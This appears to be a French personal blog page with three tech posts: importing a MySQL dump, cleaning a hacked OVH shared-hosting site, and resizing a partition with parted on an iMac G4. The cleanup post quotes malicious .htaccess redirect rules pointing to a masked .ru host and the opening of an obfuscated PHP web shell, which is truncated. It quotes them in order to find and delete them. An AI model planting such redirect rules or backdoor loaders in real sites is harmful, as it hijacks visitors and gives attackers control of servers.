Mysql: importer un dump

Une commande toute bête mais qui permet de lancer rapidement l’importation d’un dump de base, comme un backup:

mysql -u root -p -b localhost mabase < /.../.../dump.sql

root: identifiant de connexion a la base
localhost: l’adresse du serveur mysql
mabase: le nom de la base de donnée

Nettoyer un site « vérolé » sur un hébérgement mutualisé ovh

Jusqu’à ce jour je n’es eu a faire face qu’a trois attaque dirigé contre des site sous ma responsabilité. Les deux premières furent sur mangas-tv du temps ou je m’en occupait encore. Ces deux premières attaquent étais dirigé par des hackers et j’ai pu résoudre ces deux problèmes de la même manières: Je suis rentré en contact avec le hacker (annonce sur le site web en question).

J’ai actuellement comme travail la refonte d’un petit site internet (type association foyer rural) afin de remplacer un vieux site statique. J’ai récemment pu découvrir que le vieux site avait permis a des robots de rentrer sur l’hébergement tel un gruyère.

Voilà en gros ce que j’ai pu trouver sur la machine:

Des .htaccess contenant ce genre de choses

ErrorDocument 400 http://**********.ru/upday/index.php
ErrorDocument 401 http://**********.ru/upday/index.php

[...]

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|
altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|
rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch
|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search
|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick
|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey
|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro
|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase
|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)

RewriteRule ^(.*)$ http://*******.ru/upday/index.php [R=301,L]

[...]

Et des fichiers php avec ce genre de contenu:

<?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;
$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A
\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64
\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4Ck
REqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHC
tPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEk
tN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzru
mVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcu
mz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwj
AQzKhlHgTkLPCodOWCzQSCFI4 [...]

En gros on constate que des scripts php servant de porte dérobés placent des .htaccess un peu partout pour modifier le comportement du navigateurs des visiteurs. Du moins c’est ma conclusion.

Une des premières choses a faire et d’aller consulter les fichiers journaux (logs) de votre machine. Pour un hébergement mutualisé chez ovh nous avons accès a ces différents logs ici: https://logs.ovh.net/ (identifiez vous avec votre accès OVH).

Premièrement de quel manière l’attaquant entre en contact avec votre machine: FTP ? Je regarde les logs d’accès: il n’y a aucun autre accès que le mien dans les logs. On change tout de même de mot de passe.

Deuxièmement: Les accès http. On fouille dans les requêtes http voir ce que l’on trouve. Dans mon cas ces lignes sont intéressantes:

77.84.28.135 domain.tdl - [23/Feb/2012:00:00:00 +0100] "POST /fichiers/cookiemw5.php
 HTTP/1.1" 200 34 "-" "-"
79.137.237.79 domain.tdl - [23/Feb/2012:00:01:28 +0100] "POST /photos/zp-core/
zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/class.imagess.php HTTP/1.1" 
200 123 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

On peut trouver de cette manière quel sont les fichiers trojans sur le serveur. Mais ce n’est pas non plus très pratique: Des milliers voir des millions de lignes a lire (ou a exploiter avec des scripts bien sur) et la liste que vous arriverez a faire ne sera pas exhaustive.

Les hébergements « perso » chez ovh ne nous permettent pas de se connecter en ssh a la machine d’hébergement. Ce qui au final est un gros handicap de ne pas pouvoir utiliser la puissance de la ligne de commande. C’est la que ca devient intéressant: Ovh propose un accès WebDav. bingo on peut se monter un répertoire pointant sur le webdav ! (activez votre accès webdav sur l’interface ovh au préalable)

mkdir /mnt/tmp
mount.davfs https://[login].webdav.ovh.net /mnt/tmp

On peut maintenant utiliser la puissance de la ligne de commande sur les fichiers de l’hébergement mutualisé. Ma stratégie a été de rechercher dans tous les fichiers du contenu similaire a celui trouvé dans les fichiers suspects:

grep --color=auto -rn "auth_pass" /mnt/tmp | tee -a /home/bux/tmp/logvirus_a_1 
&& grep --color=auto -rn "RewriteCond" /mnt/tmp | tee -a /home/bux/tmp/logvirus_a_2

| tee -a permet de mettre dans un ffichier le résultat de la commande.

J’ai pu par la suite éplucher le résultat de mes deux commandes et lister les fichiers a supprimer. Pour le moment tout semble tranquille mais je reste au aguets, rien ne dit que je n’est pas raté certains fichiers …

Edit: Depuis le site à de nouveau été vérolé. J’ai donc du tout supprimer du FTP et réinstaller les composant un à un a partir de source propres (wordpress, gestionnaire de photos, etc)

Redimensionner une partition avec parted

Un iMac G4 a récemment est récemment passé a ma porté. Je l’es tant bien que mal accepté même si son système est propriétaire. Et même si il y a du Unix la dedans j’ai tout de même voulu installer un linux en dual boot.

Premièrement mon choix c’est porté vers ubuntu. Il m’a fallut télécharger la version PPC vu que cette machine est équipé d’un Processeur de type PowerPc (imac < 2005).
Une fois dans la procédure d’installation d’ubuntu il m’a fallut redimensionner la partition principale du disque. Cependant j’ai découvert que le redimensionnement ne peut s’opérer sur les partition de type HFS lors de l’installation d’ubuntu. Il m’a donc fallu trouver un moyen différent de la redimensionner.
J’ai donc télécharger un live cd prévu pour l’architecture PPC: Finnix .
Une fois l’iso gravé et chargé au démarrage du mac (Super+S avec un clavier non mac, sinon c’est Option+S je crois) je démarre la procédure.

J’identifie le nom du disque:

fdisk --list

Dans mon cas ce sera /dev/sda

parted /dev/sda

L’interface de parted se lance
J’identifie le numéro de la partition qui m’intéresse:

print

Pour moi c’est la 5

resize 5
Start ? [360kB]?

Je valide sans rien changer

End [80.0GB]?

Je saisie 40.00GB
La procédure se lance. Dans mon cas une bonne demi-heure. Une fois la procédure terminé j’effectue un petit redémarrage pour contrôler que tout fonctionne correctement sous mac OS X. Tout est ok, reboot et démarrage sur le livecd d’ubuntu PPC puis installation !

Attention: Les pilotes graphiques ne sont pas toujours très fonctionnels. Dans mon cas ubuntu ne démarré même pas son interface graphique. J’ai réussis a avoir des pilotes fonctionnels avec cette distrib’ mais ne fonctionnant qu’en mode dégradé.